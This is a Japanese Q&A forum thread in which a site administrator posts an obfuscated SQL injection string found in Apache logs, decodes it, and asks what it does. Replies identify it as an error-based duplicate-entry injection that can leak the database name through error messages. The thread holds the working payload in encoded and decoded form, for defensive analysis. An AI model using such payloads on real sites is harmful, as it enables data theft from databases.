teratail
回答率
85.48%
質問するログイン新規登録

質問をすることでしか得られない、回答やアドバイスがある。

15分調べてもわからないことは、質問しよう!

新規登録して質問してみよう
ただいま回答率
85.48%
トップMySQLに関する質問
MySQL

MySQL(マイエスキューエル)は、TCX DataKonsultAB社などが開発するRDBMS(リレーショナルデータベースの管理システム)です。世界で最も人気の高いシステムで、オープンソースで開発されています。MySQLデータベースサーバは、高速性と信頼性があり、Linux、UNIX、Windowsなどの複数のプラットフォームで動作することができます。

SQL

SQL(Structured Query Language)は、リレーショナルデータベース管理システム (RDBMS)のデータベース言語です。大きく分けて、データ定義言語(DDL)、データ操作言語(DML)、データ制御言語(DCL)の3つで構成されており、プログラム上でSQL文を生成して、RDBMSに命令を出し、RDBに必要なデータを格納できます。また、格納したデータを引き出すことも可能です。

Q&A

解決済

2回答

3668閲覧

以下のSQLインジェクションのコードは何をしていますか?

harukitchen
harukitchen

総合スコア34

MySQL

MySQL(マイエスキューエル)は、TCX DataKonsultAB社などが開発するRDBMS(リレーショナルデータベースの管理システム)です。世界で最も人気の高いシステムで、オープンソースで開発されています。MySQLデータベースサーバは、高速性と信頼性があり、Linux、UNIX、Windowsなどの複数のプラットフォームで動作することができます。

SQL

SQL(Structured Query Language)は、リレーショナルデータベース管理システム (RDBMS)のデータベース言語です。大きく分けて、データ定義言語(DDL)、データ操作言語(DML)、データ制御言語(DCL)の3つで構成されており、プログラム上でSQL文を生成して、RDBMSに命令を出し、RDBに必要なデータを格納できます。また、格納したデータを引き出すことも可能です。

4グッド

3クリップ

投稿2016/02/12 05:24

編集2016/02/16 11:39

4

3

apacheのログでSQLインジェクションのコードを発見しました。
元々は、こうなっていました。
=(%2f**%2fsElEcT+1+%2f**%2ffRoM(%2f**%2fsElEcT+count(),%2f**%2fcOnCaT((%2f**%2fsElEcT(%2f**%2fsElEcT+%2f**%2fuNhEx(%2f**%2fhEx(%2f**%2fcOnCaT(0x217e21,0x4142433134355a5136324457514146504f4959434644,0x217e21))))+%2f**%2ffRoM+information_schema.%2f**%2ftAbLeS+%2f**%2flImIt+0,1),floor(rand(0)2))x+%2f%2ffRoM+information_schema.%2f**%2ftAbLeS+%2f**%2fgRoUp%2f**%2fbY+x)a)

urlデコード等をして展開してみると以下のSQL文となりました。
(
select 1 from(
select count(*),concat(
(
select(
select unhex(
hex(
concat('!!','ABC145ZQ62DWQAFPOIYCFD','!!')
)
)
) from information_schema.tables limit 0,1
),
floor(rand(0)*2)
)
x from information_schema.tables groupby x
)a
)

これが何をしようとしているのかが分かりません。
またSQLの実行をしてもエラーとなりました。展開が間違っているのでしょうか?
エラーとなっていたのはこのあたりで、
x from information_schema.tables groupby x
ここを
from information_schema.tables
というようにxを省けば実行できて1という値が返ってきました。

お手数をおかけしますがご教示願えますでしょうか。

後書き:groupbyはgroup byとすることでエラーは解消されました。
その際、Duplicate entry '!!ABC145ZQ62DWQAFPOIYCFD!!1' for key 'group_key' というエラーメッセージが出ました。

luma, act823, maisumakun👍を押しています

気になる質問をクリップする

クリップした質問は、後からいつでもMYページで確認できます。

またクリップした質問に回答があった際、通知やメールを受け取ることができます。

バッドをするには、ログインかつ

こちらの条件を満たす必要があります。

guest

回答2

0

url decoderで溶かすと〜
=(//sElEcT+1+//fRoM(//sElEcT+count(*),//cOnCaT((//sElEcT(//sElEcT+//uNhEx(//hEx(//cOnCaT(0x217e21,0x4142433134355a5136324457514146504f4959434644,0x217e21))))+//fRoM+information_schema.//tAbLeS+//lImIt+0,1),floor(rand(0)*2))x+//fRoM+information_schema.//tAbLeS+//gRoUp//bY+x)a)

=(SELECT 1 FROM(SELECT count(*),CONCAT((SELECT(SELECT UNHEX(HEX(CONCAT(0x217e21,0x4142433134355a5136324457514146504f4959434644,0x217e21)))) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUPBY x)a)

クエリが1箇所間違ってる
GROUPBY -> GROUP BY
この1個を直したらオッケー!

投稿2016/02/12 10:18

編集2016/02/12 10:19
ToniVaquer
ToniVaquer

総合スコア146

バッドをするには、ログインかつ

こちらの条件を満たす必要があります。

harukitchen
harukitchen

2016/02/12 10:43

ご回答ありがとうございます。 group byだったのですね。SQLの予約語を覚えておらずお恥ずかしいです。 実行してみると Duplicate entry '!~!ABC145ZQ62DWQAFPOIYCFD!~!1' for key 'group_key' というエラーメッセージが出ました。 このSQL文は何をしようとしているかお分かりになりますでしょうか。
ToniVaquer
ToniVaquer

2016/02/15 01:06

なるほど、ね! ダブってるっぽい〜 LIMIT 0,1 -> LIMIT 1 で1個だけ出てきますよ
harukitchen
harukitchen

2016/02/16 11:34

ありがとうございます
guest

0

ベストアンサー

意図して重複させる(Duplicate entryが出る)SQLになってように思います。
正直この攻撃の意図はわかりませんでした。
他で見るのは
0x217e21,0x4142433134355a5136324457514146504f4959434644,0x217e21
の部分がdatabase()になっているもので、SQLエラーにさせることで現在利用しているDATABASE名を画面に表示させることを狙っています。

投稿2016/02/16 00:32

dupont_kedama
dupont_kedama

総合スコア925

バッドをするには、ログインかつ

こちらの条件を満たす必要があります。

harukitchen
harukitchen

2016/02/16 11:36

ご回答ありがとうございます。 なるほど、他のコードではdatabaseの名前を表示させるものもあるんですね。 気を付けるようにします。
guest

あなたの回答

tips

太字

斜体

打ち消し線

見出し

引用テキストの挿入

コードの挿入

リンクの挿入

リストの挿入

番号リストの挿入

表の挿入

水平線の挿入

プレビュー

質問の解決につながる回答をしましょう。 サンプルコードなど、より具体的な説明があると質問者の理解の助けになります。 また、読む側のことを考えた、分かりやすい文章を心がけましょう。

15分調べてもわからないことは
teratailで質問しよう!

ただいまの回答率
85.48%

質問をまとめることで
思考を整理して素早く解決

テンプレート機能で
簡単に質問をまとめる

質問する

関連した質問

トップMySQLに関する質問

以下のSQLインジェクションのコードは何をしていますか?